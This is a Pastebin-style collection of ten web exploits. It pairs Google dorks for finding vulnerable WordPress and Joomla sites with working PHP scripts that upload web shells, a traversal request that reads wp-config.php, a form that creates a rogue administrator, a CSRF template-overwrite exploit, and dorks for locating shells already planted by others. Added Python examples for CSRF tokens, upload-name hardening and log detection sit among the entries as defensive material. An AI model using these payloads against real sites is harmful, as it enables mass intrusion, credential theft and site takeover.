ToKeiChun

10 Latest Exploit [from https://pastebin.com/u/AnonGhots]

Feb 10th, 2020
YH=YH=YH=ANON=Yh=Yh=yH
#YassineElHilali

#1.Exploit Title: WordPress Font Uploader Shell Upload
Google Dork: inurl:/wp-content/plugins/font-uploader/
code===>
<?php
// Posts a file to the plugin's font-upload.php as the "font" field.
// The .php.ttf double extension is there to get past an extension check. It only
// executes on servers whose Apache configuration maps a .php segment anywhere in the
// name to the PHP handler (mod_mime multiple-extension handling), so a successful
// upload does not by itself guarantee code execution.
$uploadfile = "yourshellname.php.ttf";
$ch = curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// The "@file" upload syntax was removed in PHP 7; CURLFile is the supported form.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'font'   => new CURLFile($uploadfile),
    'Submit' => 'submit'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
========================================================
#2.Exploit Title: WordPress plugin Arbitrary File Upload (all versions)
Google Dork: inurl:assets/uploadify/ site:.com [vary the dork as needed]
==> on the site you land on, look for the uploadify file/folder and open it
sample==> http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
code==>
<?php
// The stock uploadify.php takes the file from the "Filedata" field and appends the
// "folder" value to DOCUMENT_ROOT, so folder=/ stores the file in the web root with
// its original name. No login or extension check is performed, and the response
// echoes the stored path relative to the web root.
$uploadfile = "yourshell.php";
$ch = curl_init("http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the "@file" syntax, which no longer works on PHP 7 and later.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => new CURLFile($uploadfile),
    'folder'   => '/'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
==========================================================
#3.Exploit Title: WordPress Atom Theme Arbitrary File Upload
Google Dork: inurl:"/wp-content/themes/atom/"
code==>
<?php
// Same uploadify.php handler as #2, this time bundled inside the Atom theme.
$uploadfile = "yourshell.php";
$ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the "@file" syntax, which no longer works on PHP 7 and later.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => new CURLFile($uploadfile),
    'folder'   => '/'
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>

Shell Access: http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[yourshellname].php
=============================================================
#4.Exploit Title: WordPress theme soulmedic Arbitrary File Download Vulnerability
Google Dork: inurl:"/wp-content/themes/soulmedic/"
http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
===> the response is the site's wp-config.php, which holds the database name, user and password
The flaw is in the Slider Revolution (revslider) plugin bundled with the theme, not in the theme's own code: the revslider_show_image AJAX action reads the file named by img without confining it to the plugin's directory, and admin-ajax.php serves it to unauthenticated users. The path is resolved relative to wp-admin/, which is why a single ../ reaches the WordPress root.
================================================================
#5.Exploit Title: PHP File Upload Vulnerability
Google Dork: inurl:images/jupload.php;guest100;guest100
http://www.yourtarget.com/images/jupload.php;guest100;guest100 [remove the ;guest100;guest100 suffix]
http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
If the page offers an upload form, you can upload your shell through it.
shell access==> http://www.yourtarget.com/images/shell.php
==================================================================
#6.Exploit Title: Hades+ Framework Add Administrator
Google multiple Dork: inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/
Exploit:
<!-- The option panel's "save" action stores every values[n][name]/values[n][value]
     pair as a WordPress option without requiring a logged-in user or a nonce.
     Opening registration with the default role set to "administrator" is what
     turns that into an admin account. -->
<form action="http://www.yourtarget.com/wp-content/themes/[themename, e.g. appius, Consultant, archin]/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Process==>
1. Replace [themename, ...] with the directory name of the vulnerable theme and {%YOUR_EMAIL} with your email address.
sample==> http://www.yourtarget.com/wp-content/themes/[vulnerable theme name]/hades_framework/option_panel/ajax.php
2. Go to http://www.yourtarget.com/wp-login.php?action=register; with users_can_register set, the registration form is shown.
3. Choose a username and email address and register.
4. Check your email: WordPress sends the new account's password (on WordPress 4.3 and later, a link to set one). Because default_role is now "administrator", the account is an administrator, and because admin_email was changed, the new-user notification goes to you instead of the real site owner.
5. Log in and upload your shell.
===============================================================
#7.Exploit Title: WordPress Dandelion Theme Arbitrary File Upload
Google Dork: inurl:/wp-content/themes/dandelion/
Code==>
<?php
// The theme's functions/upload-handler.php stores the "Filedata" field as sent.
$uploadfile = "yourshell.php";
$ch = curl_init("http://www.yourtarget.com/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the "@file" syntax, which no longer works on PHP 7 and later.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => new CURLFile($uploadfile)
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
shell link=> http://www.yourtarget.com/uploads/[year]/[month]/your_shell.php (path as given in the original; WordPress normally keeps uploads under /wp-content/uploads/, so check the handler's response for the real location)
=====================================================================
#8.Exploit Title: WordPress Satoshi Theme Arbitrary File Upload
Google Dork: inurl:/wp-content/themes/satoshi/
Code==>
<?php
// Same upload-handler.php as the Dandelion theme in #7.
$uploadfile = "yourshell.php";
$ch = curl_init("http://www.yourtarget.com/wp-content/themes/satoshi/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the "@file" syntax, which no longer works on PHP 7 and later.
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => new CURLFile($uploadfile)
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print $postResult;
?>
========================================================================
#8.Exploit Title: Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
<?php
/**
 * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
 * 3 October 2010
 * jdc
 *
 * How it works - admin template form has no nonce
 * How to exploit - get a logged in admin to click the wrong link ;)
 * Patched in 2.1.7
 */
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
    'pagecontent' => $exploit,
    'template'    => 'm2',
    'option'      => 'com_mtree',
    'task'        => 'save_templatepage',
    'page'        => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<!-- Inner frame: the form auto-submits to the Joomla backend, and the browser
     attaches the victim's admin session cookie. Nothing in the request proves
     the admin intended it, which is the missing nonce. -->
<form id="csrf" action="<?php echo htmlspecialchars($target.$path); ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>"
name="<?php echo htmlspecialchars($k); ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<!-- Re-open this same script in a hidden frame. The original had "<?php __FILE__; ?>"
     here, which outputs nothing because it lacks an echo, so the frame never loaded. -->
<iframe width="1" height="1" src="<?php echo htmlspecialchars(basename(__FILE__)); ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>
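The Mosets Tree bug above is the absence of a per-session token on the admin form. The following is an added example, not code from the page or from Mosets Tree or Joomla, showing in Python what the missing check amounts to: a token bound to the admin's session and to the specific task, generated with an HMAC under an assumed server secret, and a simulated save handler with and without that check, driven with the same form fields the exploit submits. The session ids, the secret and the template store are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Assumed per-deployment secret; in a real application it lives in configuration.
SERVER_SECRET = secrets.token_bytes(32)


def make_nonce(session_id: str, action: str) -> str:
    """Token bound to one session and one action; the server never stores it."""
    msg = f"{session_id}\x00{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def nonce_ok(session_id: str, action: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison; a missing or foreign-session token fails."""
    if not submitted:
        return False
    return hmac.compare_digest(make_nonce(session_id, action), submitted)


# Simulated template store the save handler writes into (constructed).
TEMPLATES: Dict[str, str] = {"page_print": "<p>original print template</p>"}


def save_templatepage_2_1_6(session_id: str, form: Dict[str, str]) -> bool:
    """The 2.1.6 behaviour described above: a valid admin session is all that is checked."""
    if not session_id:
        return False
    TEMPLATES[form["page"]] = form["pagecontent"]
    return True


def save_templatepage_patched(session_id: str, form: Dict[str, str]) -> bool:
    """Same handler with the nonce check: a cross-site form cannot supply _token,
    because the attacker's page can neither read the admin's token nor forge it."""
    if not session_id or not nonce_ok(session_id, "save_templatepage", form.get("_token")):
        return False
    TEMPLATES[form["page"]] = form["pagecontent"]
    return True


def simulate() -> Dict[str, bool]:
    """Replay the scenario from the exploit against both handlers with constructed data."""
    admin_session = "sess-admin-42"
    # Exactly the fields the CSRF page posts; no _token, since the attacker has none.
    attacker_form = {"option": "com_mtree", "task": "save_templatepage",
                     "page": "page_print", "template": "m2",
                     "pagecontent": "<?php echo phpinfo(); ?>"}
    # What the real admin form carries: same fields plus a token for the admin's session.
    legit_form = dict(attacker_form, pagecontent="<p>edited by admin</p>",
                      _token=make_nonce(admin_session, "save_templatepage"))
    # A token the attacker minted in their own session does not match the victim's.
    foreign = dict(attacker_form, _token=make_nonce("sess-attacker-7", "save_templatepage"))

    results: Dict[str, bool] = {}
    TEMPLATES["page_print"] = "<p>original print template</p>"
    results["unpatched_csrf"] = save_templatepage_2_1_6(admin_session, attacker_form)
    TEMPLATES["page_print"] = "<p>original print template</p>"
    results["patched_csrf"] = save_templatepage_patched(admin_session, attacker_form)
    results["patched_foreign_token"] = save_templatepage_patched(admin_session, foreign)
    results["patched_legit"] = save_templatepage_patched(admin_session, legit_form)
    return results


if __name__ == "__main__":
    for name, accepted in simulate().items():
        print(f"{name:22} {'ACCEPTED' if accepted else 'rejected'}")
```

Binding the token to the action name as well as the session means a token leaked from one form cannot be replayed against another; Joomla's own implementation differs in detail, but the property the 2.1.7 fix restores is the same one.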
#9.Exploit Title: WordPress themes with a potentially vulnerable valums uploader
1. dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php

upload form (HTML):

<form enctype="multipart/form-data"
action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<!-- "jpg" is not an input type; browsers fall back to a text field, so this is the same thing. -->
<input type="text" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
If the URL lets you upload your shell, upload it; if it answers with an error, move on to another site.
shell link==>
http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
http://www.yourtarget.com/wp-content/uploads/shell.php
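Every upload entry in this list (#1, #2, #3, #7, #8 and #9) comes down to an upload handler that stores whatever filename the client sends. The block below is an added example, not code from the page or from any of the themes or plugins named, written in Python rather than PHP so it runs stand-alone: it contrasts the suffix-only check the .php.ttf payload is built to pass with a hardened name check (exactly one extension, an allowlist, script extensions rejected wherever they appear, and a random server-chosen name). The sample filenames are constructed, and the extension sets are assumptions rather than anything taken from a real uploader.

```python
import os
import secrets
from typing import Dict, Iterable, Optional, Set, Tuple

# Assumed allowlists for a font uploader and an image uploader.
FONT_EXTENSIONS: Set[str] = {"ttf", "otf", "woff", "woff2"}
IMAGE_EXTENSIONS: Set[str] = {"jpg", "jpeg", "png", "gif"}
# Anything a web server might hand to a script engine; rejected wherever it appears.
SCRIPT_EXTENSIONS: Set[str] = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl"}


def naive_is_font(filename: str) -> bool:
    """The kind of check the .php.ttf payload is aimed at: only the last suffix is examined."""
    return filename.lower().endswith(".ttf")


def safe_upload_name(filename: str, allowed: Set[str]) -> Optional[str]:
    """Return a server-chosen name to store the file under, or None to reject it.

    1. strip any directory part (defeats folder=/ and ../ tricks carried in the name);
    2. require exactly one extension (defeats shell.php.ttf on Apache mod_mime, which
       treats every dot-separated segment as a candidate handler);
    3. the extension must be in the allowlist and must never be a script type;
    4. the stored name is random, so the uploader neither chooses nor learns it.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return None
    ext = parts[1]
    if ext not in allowed or ext in SCRIPT_EXTENSIONS:
        return None
    return f"{secrets.token_hex(16)}.{ext}"


def triage(filenames: Iterable[str], allowed: Set[str]) -> Dict[str, Tuple[bool, bool]]:
    """Run both checks over a batch: {name: (naive_accepts, hardened_accepts)}."""
    return {name: (naive_is_font(name), safe_upload_name(name, allowed) is not None)
            for name in filenames}


# Constructed sample names, not taken from any real upload. The first three are the
# payload shapes used in this paste; the last two are what a font uploader should accept.
SAMPLES = ["yourshellname.php.ttf", "yourshell.php", "shell.pHp.TTF",
           "OpenSans-Regular.ttf", "../../etc/cron.d/job.ttf"]

if __name__ == "__main__":
    for name, (naive, hardened) in triage(SAMPLES, FONT_EXTENSIONS).items():
        print(f"{name:28} naive={'accept' if naive else 'reject':7} "
              f"hardened={'accept' if hardened else 'reject'}")
```

The name check is only half of a fix: the stored file still has to land outside the document root, or in a directory where the PHP handler is switched off, so that a mistake in the allowlist cannot turn into code execution.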
#10.Exploit Title: For Noobs [Dorking for shells]
b374k m1n1
google dork:
intitle:b374k m1n1 inurl:wp-content
intitle:"index of /" "b374k.php"


Dorking shell wso
google dork:
intitle:"Index of /uploads" "wso.php"
intitle:"index of /" "wso.php"


Dorking Shell Madspot
This shell has no password by default and gets indexed by Google, so we can dork to find it.
google dork:
intitle:Madspot Security site:com


Dorking Shell 1n73ct10n
google dork:
intitle:1n73ct10n inurl:wp-content
intitle:"index of /" "1n73ct10n.php"
###########################################################################################
You can find many tutorials on Google for JCE/Revslider/Com_user/com_fabrik/WebDAV/JDownloads.
But if you are a pro at CMS/backend web development, you can write your own exploits for Joomla/WordPress/Drupal/WooCommerce etc.; for that you need a very clear understanding of web applications and how they are built.
A website is a huge surface (plugins, themes, components, widgets, frameworks: Joomla, WordPress, Drupal, Bootstrap, phpBB, etc.), and many high-profile backend developers will reward you for reporting bugs.
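For the defender's side of the whole list: an added example, not from the page, in Python that runs a few rules over access-log lines and flags the request shapes described above: POSTs to the named upload handlers and to the Hades option panel, admin-ajax.php calls with action=revslider_show_image and a traversal in img, script files under wp-content/uploads (double extensions included), and requests for the shell filenames from the dorks. The log lines are constructed for the example; the path suffixes are the ones given in this paste and are not a complete list.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Minimal parser for the Apache/nginx "combined" format: client IP, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Upload handlers named in this paste, matched as path suffixes (the theme part varies).
UPLOADER_SUFFIXES = (
    "/font-uploader/font-upload.php",
    "/uploadify/uploadify.php",
    "/functions/upload-handler.php",
    "/valums_uploader/php.php",
)
OPTION_PANEL_SUFFIX = "/hades_framework/option_panel/ajax.php"
SHELL_BASENAMES = {"wso.php", "b374k.php", "1n73ct10n.php"}
SCRIPT_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

Hit = Tuple[str, str, str]  # (rule, client ip, path or full target)


def has_script_segment(path: str) -> bool:
    """True if any dot-separated suffix is a script extension (catches shell.php.ttf too)."""
    basename = path.rsplit("/", 1)[-1]
    return any(seg in SCRIPT_SEGMENTS for seg in basename.split(".")[1:])


def classify(line: str) -> List[Hit]:
    """Return one hit per rule the log line triggers; an unparsable line yields none."""
    m = LINE_RE.match(line)
    if not m:
        return []
    ip, method, target = m.group("ip", "method", "target")
    raw_path, _, raw_query = target.partition("?")
    path, query = unquote(raw_path), unquote(raw_query)   # decode after splitting
    path_l, query_l = path.lower(), query.lower()
    hits: List[Hit] = []
    if method == "POST" and path_l.endswith(UPLOADER_SUFFIXES):
        hits.append(("upload-endpoint-post", ip, path))
    if method == "POST" and path_l.endswith(OPTION_PANEL_SUFFIX):
        hits.append(("unauth-option-write", ip, path))
    if (path_l.endswith("/wp-admin/admin-ajax.php")
            and "action=revslider_show_image" in query_l
            and ("../" in query_l or "..\\" in query_l)):
        hits.append(("revslider-traversal", ip, target))
    if "/wp-content/uploads/" in path_l and has_script_segment(path_l):
        hits.append(("script-under-uploads", ip, path))
    if path_l.rsplit("/", 1)[-1] in SHELL_BASENAMES or "madspot" in path_l:
        hits.append(("known-shell-name", ip, path))
    return hits


def scan(log_text: str) -> List[Hit]:
    """Classify every non-empty line of a log dump."""
    return [hit for line in log_text.splitlines() if line.strip() for hit in classify(line)]


# Constructed sample log (documentation IP ranges); not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2020:12:00:01 +0000] "POST /wp-content/plugins/font-uploader/font-upload.php HTTP/1.1" 200 57 "-" "curl/7.64.0"
203.0.113.5 - - [10/Feb/2020:12:00:03 +0000] "GET /wp-content/uploads/yourshellname.php.ttf HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2020:12:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php HTTP/1.1" 200 2980 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Feb/2020:12:01:30 +0000] "POST /wp-content/themes/archin/hades_framework/option_panel/ajax.php HTTP/1.1" 200 2 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Feb/2020:12:02:00 +0000] "POST /wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Feb/2020:12:02:05 +0000] "GET /wp-content/uploads/wso.php HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Feb/2020:12:03:00 +0000] "GET /wp-content/uploads/2020/02/photo.jpg HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Feb/2020:12:03:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for rule, ip, where in scan(SAMPLE_LOG):
        print(f"{rule:22} {ip:14} {where}")
```

The rules key on request shape rather than response code on purpose: a 404 against one of these handlers is still a scan worth correlating by source address, and the upload rule followed shortly by a script fetch from wp-content/uploads by the same address is the sequence the entries above produce.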